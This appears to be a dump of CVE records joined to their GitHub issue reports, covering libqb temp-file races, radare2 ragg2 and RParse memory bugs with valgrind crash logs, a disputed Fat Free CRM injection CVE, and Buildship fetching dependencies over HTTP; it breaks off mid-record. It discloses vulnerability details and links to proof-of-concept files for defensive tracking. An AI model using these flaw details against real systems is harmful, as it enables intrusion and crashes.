[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:clusterlabs:libqb:*:*:*:*:*:*:*:*", "matchCriteriaId": "74096D2C-384E-446D-8A07-6F58DEBA04C7", "versionEndExcluding": "1.0.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/ClusterLabs/libqb/issues/338
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ClusterLabs", "libqb" ]
Libqb creates files in world-writable directories (`/dev/shm`, `/tmp`) with rather predictable file names (e.g. `/dev/shm/qb-usbguard-request-7096-835-12-data` in case of USBGuard). Also `O_EXCL` flag is not used when opening the files. This could be exploited by a local attacker to overwrite privileged system files (if not restricted by sandboxing, MAC or symlinking policies). At least `O_EXCL` flag should be used. I'd also use more complex logic where files are created with unpredictable names (also using `O_TMPFILE`) and then possibly renamed to match file naming convention (if the protocol does not allow completely random file names). I would not use files for IPC.
Insecure Temporary Files
https://api.github.com/repos/ClusterLabs/libqb/issues/338/comments
62
2019-03-01T14:15:25Z
2022-02-03T14:51:51Z
https://github.com/ClusterLabs/libqb/issues/338
416,121,589
338
418
CVE-2019-12790
2019-06-10T19:29:00.700
In radare2 through 3.5.1, there is a heap-based buffer over-read in the r_egg_lang_parsechar function of egg_lang.c. This allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact because of missing length validation in libr/egg/egg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14211" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IEXZWAMVKGZKHALV4IVWQS2ORJKRH57U/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SX4TLTE75VYUGSPYEKMYFPUZMRDIR7O2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14211" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IEXZWAMVKGZKHALV4IVWQS2ORJKRH57U/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SX4TLTE75VYUGSPYEKMYFPUZMRDIR7O2/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/radare/radare2/issues/14211
[ "Exploit", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | radare2 3.6.0-git 21923 @ linux-x86-64 git.3.5.1-149-g573f2caa3 commit: 573f2caa3d3938c3fb3032f11907bc88cbc06f9e build: 2019-06-02__15:06:21 ### Expected behavior ```bash $ ragg2 -a x86 -b 64 hello.r $ <output asmcode> ``` ### Actual behavior ```bash $ ragg2 -a x86 -b 64 hello.r $ Segmentation fault (core dumped) ``` ### Steps to reproduce the behavior Unzip [hello.zip](https://github.com/radare/radare2/files/3245130/hello.zip) and you will get `hello.r` ### Additional Logs, screenshots, source-code, configuration dump, ... After checking the source code, the vulnerability is caused by lacking boundary checking for ["egg->lang.elem_n++"](https://github.com/radare/radare2/blob/master/libr/egg/egg_lang.c#L1255), resulting a heap buffer overflow. It could be fixed quickly by adding associated checking.
ragg2 crash on long valid input.
https://api.github.com/repos/radareorg/radare2/issues/14211/comments
2
2019-06-02T19:35:30Z
2019-06-03T15:43:11Z
https://github.com/radareorg/radare2/issues/14211
451,226,398
14,211
419
CVE-2019-10226
2019-06-10T23:29:02.467
HTML Injection has been discovered in the v0.19.0 version of the Fat Free CRM product via an authenticated request to the /comments URI. NOTE: the vendor disputes the significance of this report because some HTML formatting (such as with an H1 element) is allowed, but there is a XSS protection mechanism.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://apidock.com/rails/ActionView/Helpers/TextHelper/simple_format" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/fatfreecrm/fat_free_crm/blob/master/app/views/comments/_comment.html.haml#L2" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/fatfreecrm/fat_free_crm/issues/1235" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.exploit-db.com/exploits/46617/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://apidock.com/rails/ActionView/Helpers/TextHelper/simple_format" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/fatfreecrm/fat_free_crm/blob/master/app/views/comments/_comment.html.haml#L2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/fatfreecrm/fat_free_crm/issues/1235" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.exploit-db.com/exploits/46617/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fatfreecrm:fat_free_crm:0.19.0:*:*:*:*:*:*:*", "matchCriteriaId": "D85D91B5-2F95-4804-906C-C489AD599283", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/fatfreecrm/fat_free_crm/issues/1235
null
github.com
[ "fatfreecrm", "fat_free_crm" ]
Back in 2019, a post appeared incorrectly claiming to have found a vulnerability in Fat Free CRM: http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html This claim was submitted to the Fat Free CRM security mailing list at the time and was checked out. It was found to be false positive but for some reason, a CVE had already been requested by the original poster (not by the FFCRM team). The poster was asked to close the CVE, but I have now realised this never happened and the CVE is currently still open. This CVE has now made its way into GitHub's security database and various tools that depend on it are flagging current versions of Fat Free CRM as erroneously having a vulnerability (e.g. bundle-audit). I've raised a PR for the GHSA asking for it to be removed but was advised that we need to contact MITRE as they are the original assigning entity. **Action**: Request an update to an existing CVE Entry by using the form at https://cveform.mitre.org/ This ticket is here to track my progress. References: * CVE-2019-10226 * GHSA-gmg5-r3c4-3fm9 * http://packetstormsecurity.com/files/152263/Fat-Free-CRM-0.19.0-HTML-Injection.html * https://github.com/github/advisory-database/pull/3599 * https://nvd.nist.gov/vuln/detail/CVE-2019-10226
Address issue with incorrect open CVE-2019-10226
https://api.github.com/repos/fatfreecrm/fat_free_crm/issues/1235/comments
6
2024-02-21T09:36:35Z
2024-02-28T14:01:38Z
https://github.com/fatfreecrm/fat_free_crm/issues/1235
2,146,259,070
1,235
420
CVE-2019-12802
2019-06-13T21:29:16.270
In radare2 through 3.5.1, the rcc_context function of libr/egg/egg_lang.c mishandles changing context. This allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact (invalid memory access in r_egg_lang_parsechar; invalid free in rcc_pusharg).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14296" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IEXZWAMVKGZKHALV4IVWQS2ORJKRH57U/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SX4TLTE75VYUGSPYEKMYFPUZMRDIR7O2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14296" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IEXZWAMVKGZKHALV4IVWQS2ORJKRH57U/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SX4TLTE75VYUGSPYEKMYFPUZMRDIR7O2/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "matchCriteriaId": "D100F7CE-FC64-4CC6-852A-6136D72DA419", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/radare/radare2/issues/14296
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
Ragg2 lacks boundary check when changing context in [here](https://github.com/radare/radare2/blob/master/libr/egg/egg_lang.c#L769). When `CTX=31 && delta=1` or `CTX=0 && delta=-1`, `CTX` would be out of boundary. As a result, it could cause both invalid memory access and invalid free. ### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | radare2 3.6.0-git 22036 @ linux-x86-64 git.3.5.1-229-g571a080ca commit: 571a080ca732ba585686a5580de2d14f18453a29 build: 2019-06-13__14:28:05 ### Expected behavior NO CRASH ### Actual behavior #### Invalid Memory Access ```bash $ ragg2 invalid_memory_access.r Segmentation fault (core dumped) ``` #### Invalid Free ```bash $ ragg2 invalid_free.r munmap_chunk(): invalid pointer Aborted (core dumped) ``` ### Steps to reproduce the behavior - Follow actions mentioned above. ### Additional Logs, screenshots, source-code, configuration dump, ... #### Invalid Memory Access [invalid_memory_access.zip](https://github.com/radare/radare2/files/3287654/invalid_memory_access.zip) Output of valgrind: ```bash --3958-- REDIR: 0x517a120 (libc.so.6:__strchrnul_sse2) redirected to 0x4c37020 (strchrnul) --3958-- REDIR: 0x5184440 (libc.so.6:__mempcpy_sse2_unaligned) redirected to 0x4c37130 (mempcpy) --3958-- REDIR: 0x5167b20 (libc.so.6:strstr) redirected to 0x4a2a6e0 (_vgnU_ifunc_wrapper) --3958-- REDIR: 0x5183db0 (libc.so.6:__strstr_sse2_unaligned) redirected to 0x4c376e0 (strstr) --3958-- REDIR: 0x5167590 (libc.so.6:__GI_strstr) redirected to 0x4c37760 (__strstr_sse2) ==3958== Invalid read of size 1 ==3958== at 0x4C376FA: strstr (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==3958== by 0x8AA3475: r_egg_lang_parsechar (egg_lang.c:1316) ==3958== by 0x8A9E376: r_egg_compile (egg.c:345) ==3958== by 0x4E4B1AD: r_main_ragg2 (ragg2.c:399) ==3958== by 0x108739: main (ragg2.c:6) ==3958== Address 0x100000001 is not stack'd, malloc'd or (recently) free'd ==3958== ==3958== ==3958== Process terminating with default action of signal 11 (SIGSEGV) ==3958== Access not within mapped region at address 0x100000001 ==3958== at 0x4C376FA: strstr (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==3958== by 0x8AA3475: r_egg_lang_parsechar (egg_lang.c:1316) ==3958== by 0x8A9E376: r_egg_compile (egg.c:345) ==3958== by 0x4E4B1AD: r_main_ragg2 (ragg2.c:399) ==3958== by 0x108739: main (ragg2.c:6) ==3958== If you believe this happened as a result of a stack ==3958== overflow in your program's main thread (unlikely but ==3958== possible), you can try to increase the size of the ==3958== main thread stack using the --main-stacksize= flag. ==3958== The main thread stack size used in this run was 8388608. ==3958== ==3958== HEAP SUMMARY: ==3958== in use at exit: 55,192 bytes in 212 blocks ==3958== total heap usage: 943 allocs, 731 frees, 109,445 bytes allocated ==3958== ==3958== Searching for pointers to 212 not-freed blocks ==3958== Checked 5,555,720 bytes ==3958== ==3958== LEAK SUMMARY: ==3958== definitely lost: 0 bytes in 0 blocks ==3958== indirectly lost: 0 bytes in 0 blocks ==3958== possibly lost: 0 bytes in 0 blocks ==3958== still reachable: 55,192 bytes in 212 blocks ==3958== suppressed: 0 bytes in 0 blocks ==3958== Rerun with --leak-check=full to see details of leaked memory ==3958== ==3958== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ==3958== ==3958== 1 errors in context 1 of 1: ==3958== Invalid read of size 1 ==3958== at 0x4C376FA: strstr (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==3958== by 0x8AA3475: r_egg_lang_parsechar (egg_lang.c:1316) ==3958== by 0x8A9E376: r_egg_compile (egg.c:345) ==3958== by 0x4E4B1AD: r_main_ragg2 (ragg2.c:399) ==3958== by 0x108739: main (ragg2.c:6) ==3958== Address 0x100000001 is not stack'd, malloc'd or (recently) free'd ==3958== ==3958== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) [1] 3958 segmentation fault (core dumped) ``` #### Invalid Free [invalid_free.zip](https://github.com/radare/radare2/files/3287673/invalid_free.zip) Output of valgrind ```bash --4253-- REDIR: 0x5184870 (libc.so.6:__memset_sse2_unaligned) redirected to 0x4c365d0 (memset) --4253-- REDIR: 0x5161c30 (libc.so.6:realloc) redirected to 0x4c31cb0 (realloc) --4253-- REDIR: 0x5184460 (libc.so.6:memcpy@GLIBC_2.2.5) redirected to 0x4c34060 (memcpy@GLIBC_2.2.5) --4253-- REDIR: 0x5160950 (libc.so.6:free) redirected to 0x4c30cd0 (free) --4253-- REDIR: 0x517a620 (libc.so.6:__strlen_sse2) redirected to 0x4c32d30 (__strlen_sse2) --4253-- REDIR: 0x5179f00 (libc.so.6:__strchr_sse2) redirected to 0x4c328d0 (__strchr_sse2) --4253-- REDIR: 0x517a120 (libc.so.6:__strchrnul_sse2) redirected to 0x4c37020 (strchrnul) --4253-- REDIR: 0x5184440 (libc.so.6:__mempcpy_sse2_unaligned) redirected to 0x4c37130 (mempcpy) --4253-- REDIR: 0x5167b20 (libc.so.6:strstr) redirected to 0x4a2a6e0 (_vgnU_ifunc_wrapper) --4253-- REDIR: 0x5183db0 (libc.so.6:__strstr_sse2_unaligned) redirected to 0x4c376e0 (strstr) --4253-- REDIR: 0x5167590 (libc.so.6:__GI_strstr) redirected to 0x4c37760 (__strstr_sse2) --4253-- REDIR: 0x524e510 (libc.so.6:__strncmp_sse42) redirected to 0x4c33570 (__strncmp_sse42) --4253-- REDIR: 0x517f540 (libc.so.6:__strcpy_sse2_unaligned) redirected to 0x4c32dd0 (strcpy) ==4253== Invalid free() / delete / delete[] / realloc() ==4253== at 0x4C30D3B: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==4253== by 0x8A9FA5F: rcc_pusharg (egg_lang.c:332) ==4253== by 0x8A9FCE5: rcc_element (egg_lang.c:379) ==4253== by 0x8AA32C5: r_egg_lang_parsechar (egg_lang.c:1291) ==4253== by 0x8A9E376: r_egg_compile (egg.c:345) ==4253== by 0x4E4B1AD: r_main_ragg2 (ragg2.c:399) ==4253== by 0x108739: main (ragg2.c:6) ==4253== Address 0x8aa8b8b is in a r-x mapped file $HOME/github/radare2/libr/egg/libr_egg.so segment ==4253== ERROR: expected '}' at the end of the file. 32 left r_egg_compile: fail ==4253== ==4253== HEAP SUMMARY: ==4253== in use at exit: 4 bytes in 1 blocks ==4253== total heap usage: 950 allocs, 950 frees, 109,591 bytes allocated ==4253== ==4253== Searching for pointers to 1 not-freed blocks ==4253== Checked 5,500,248 bytes ==4253== ==4253== LEAK SUMMARY: ==4253== definitely lost: 4 bytes in 1 blocks ==4253== indirectly lost: 0 bytes in 0 blocks ==4253== possibly lost: 0 bytes in 0 blocks ==4253== still reachable: 0 bytes in 0 blocks ==4253== suppressed: 0 bytes in 0 blocks ==4253== Rerun with --leak-check=full to see details of leaked memory ==4253== ==4253== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ==4253== ==4253== 1 errors in context 1 of 1: ==4253== Invalid free() / delete / delete[] / realloc() ==4253== at 0x4C30D3B: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==4253== by 0x8A9FA5F: rcc_pusharg (egg_lang.c:332) ==4253== by 0x8A9FCE5: rcc_element (egg_lang.c:379) ==4253== by 0x8AA32C5: r_egg_lang_parsechar (egg_lang.c:1291) ==4253== by 0x8A9E376: r_egg_compile (egg.c:345) ==4253== by 0x4E4B1AD: r_main_ragg2 (ragg2.c:399) ==4253== by 0x108739: main (ragg2.c:6) ==4253== Address 0x8aa8b8b is in a r-x mapped file $HOME/github/radare2/libr/egg/libr_egg.so segment ==4253== ==4253== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ```
Ragg2 Lacks Boundary Check when Changing Context
https://api.github.com/repos/radareorg/radare2/issues/14296/comments
1
2019-06-13T18:56:39Z
2019-06-21T07:43:05Z
https://github.com/radareorg/radare2/issues/14296
455,902,075
14,296
421
CVE-2019-11770
2019-06-14T14:29:00.530
In Eclipse Buildship versions prior to 3.1.1, the build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "emo@eclipse.org", "tags": [ "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=547734" }, { "source": "emo@eclipse.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse/buildship/issues/855" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=547734" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse/buildship/issues/855" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:buildship:*:*:*:*:*:*:*:*", "matchCriteriaId": "EBF9674F-C2C1-4616-8D8E-F0377906955C", "versionEndExcluding": "3.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "669" ]
669
https://github.com/eclipse/buildship/issues/855
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eclipse", "buildship" ]
[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html) The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS v3.0 Base Score of 8.1/10 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H ### This isn't just theoretical POC code exists already to maliciously compromise a JAR file inflight. See: - https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/ - https://github.com/mveytsman/dilettante ### MITM Attacks Increasingly Common: See: * https://serverfault.com/a/153065 * https://security.stackexchange.com/a/12050 ### Source Locations: Download of Eclipse SDK: - https://github.com/eclipse/buildship/blob/3348ffc10e50963c67110d34374be5f0abebb4af/build.gradle#L433-L443 - https://github.com/eclipse/buildship/blob/4ee595bd33bd84cb788debc15900a98af6f05c59/buildSrc/src/main/groovy/eclipsebuild/Constants.groovy#L99 Eclipse SDK has no checksum verification: - https://github.com/eclipse/buildship/blob/4ee595bd33bd84cb788debc15900a98af6f05c59/buildSrc/src/main/groovy/eclipsebuild/DownloadEclipseSdkTask.groovy#L21-L60 Download of Gradle: - https://github.com/eclipse/buildship/blob/4ee595bd33bd84cb788debc15900a98af6f05c59/org.eclipse.buildship.core.test/src/main/groovy/org/eclipse/buildship/core/internal/workspace/InitializeNewProjectOperationTest.groovy#L34
Releases should not depend on insecure or untrusted code
https://api.github.com/repos/eclipse-buildship/buildship/issues/855/comments
8
2019-02-18T21:04:48Z
2019-07-01T13:56:05Z
https://github.com/eclipse-buildship/buildship/issues/855
411,643,301
855
422
CVE-2019-12829
2019-06-15T17:29:10.637
radare2 through 3.5.1 mishandles the RParse API, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact, as demonstrated by newstr buffer overflows during replace operations. This affects libr/asm/asm.c and libr/parse/parse.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14303" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/radare/radare2/issues/14303" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0EAF4EA5-271D-41A3-902C-1E640CBF03C3", "versionEndExcluding": null, "versionEndIncluding": "3.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/radare/radare2/issues/14303
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "radare", "radare2" ]
For x86.pseudo (and other RParsePlugins), function [replace](https://github.com/radare/radare2/blob/66f7403245/libr/parse/p/parse_x86_pseudo.c#L15) lacks a boundary check for `newstr`, leading heap-/stack-based buffer over-write. So do other RParsePlugins. Such buffer overflow could be trigger from [rasm2](https://github.com/radare/radare2/blob/66f7403245c923c192019ef0219f67b9928b39da/libr/asm/asm.c#L460). As [r_parse_parse](https://github.com/radare/radare2/blob/d7d104ac4b8ead3a9a2378b83fa72e89e4480854/libr/parse/parse.c#L96), which actually calls function [replace](https://github.com/radare/radare2/blob/66f7403245/libr/parse/p/parse_x86_pseudo.c#L15) for x86.pseudo, could extend `buf_asm` and write back to `buf_asm`, it would cause a heap-based buffer over-write. ### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | radare2 3.6.0-git 22043 @ linux-x86-64 git.3.5.1-235-ga1ade7d87 commit: 